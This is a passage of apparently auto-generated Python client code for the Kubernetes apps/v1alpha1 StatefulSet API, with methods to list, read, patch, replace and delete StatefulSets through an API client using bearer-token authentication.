(data) = self.delete_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
return data
def delete_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, name, namespace, body, **kwargs):
"""
delete a StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_apps_v1alpha1_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_apps_v1alpha1_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def get_apps_v1alpha1_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_apps_v1alpha1_api_resources(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_apps_v1alpha1_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_apps_v1alpha1_api_resources_with_http_info(**kwargs)
return data
def get_apps_v1alpha1_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_apps_v1alpha1_api_resources_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_apps_v1alpha1_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedAPIResourceList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def list_apps_v1alpha1_namespaced_stateful_set(self, namespace, **kwargs):
"""
list or watch objects of kind StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_apps_v1alpha1_namespaced_stateful_set(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1StatefulSetList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, **kwargs)
else:
(data) = self.list_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, **kwargs)
return data
def list_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, namespace, **kwargs):
"""
list or watch objects of kind StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1StatefulSetList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_apps_v1alpha1_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_apps_v1alpha1_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSetList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def list_apps_v1alpha1_stateful_set_for_all_namespaces(self, **kwargs):
"""
list or watch objects of kind StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_apps_v1alpha1_stateful_set_for_all_namespaces(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1StatefulSetList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_apps_v1alpha1_stateful_set_for_all_namespaces_with_http_info(**kwargs)
else:
(data) = self.list_apps_v1alpha1_stateful_set_for_all_namespaces_with_http_info(**kwargs)
return data
def list_apps_v1alpha1_stateful_set_for_all_namespaces_with_http_info(self, **kwargs):
"""
list or watch objects of kind StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_apps_v1alpha1_stateful_set_for_all_namespaces_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1StatefulSetList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_apps_v1alpha1_stateful_set_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/statefulsets'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSetList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def patch_apps_v1alpha1_namespaced_stateful_set(self, name, namespace, body, **kwargs):
"""
partially update the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_apps_v1alpha1_namespaced_stateful_set(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
return data
def patch_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, name, namespace, body, **kwargs):
"""
partially update the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_apps_v1alpha1_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_apps_v1alpha1_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def patch_apps_v1alpha1_namespaced_stateful_set_status(self, name, namespace, body, **kwargs):
"""
partially update status of the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_apps_v1alpha1_namespaced_stateful_set_status(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, **kwargs)
return data
def patch_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(self, name, namespace, body, **kwargs):
"""
partially update status of the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_apps_v1alpha1_namespaced_stateful_set_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_apps_v1alpha1_namespaced_stateful_set_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_apps_v1alpha1_namespaced_stateful_set_status`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_apps_v1alpha1_namespaced_stateful_set_status`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}/status'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def read_apps_v1alpha1_namespaced_stateful_set(self, name, namespace, **kwargs):
"""
read the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_apps_v1alpha1_namespaced_stateful_set(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, **kwargs)
return data
def read_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, name, namespace, **kwargs):
"""
read the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty', 'exact', 'export']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_apps_v1alpha1_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_apps_v1alpha1_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'exact' in params:
query_params['exact'] = params['exact']
if 'export' in params:
query_params['export'] = params['export']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def read_apps_v1alpha1_namespaced_stateful_set_status(self, name, namespace, **kwargs):
"""
read status of the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_apps_v1alpha1_namespaced_stateful_set_status(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, **kwargs)
return data
def read_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(self, name, namespace, **kwargs):
"""
read status of the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_apps_v1alpha1_namespaced_stateful_set_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_apps_v1alpha1_namespaced_stateful_set_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_apps_v1alpha1_namespaced_stateful_set_status`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}/status'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def replace_apps_v1alpha1_namespaced_stateful_set(self, name, namespace, body, **kwargs):
"""
replace the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_apps_v1alpha1_namespaced_stateful_set(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
return data
def replace_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, name, namespace, body, **kwargs):
"""
replace the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_apps_v1alpha1_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_apps_v1alpha1_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
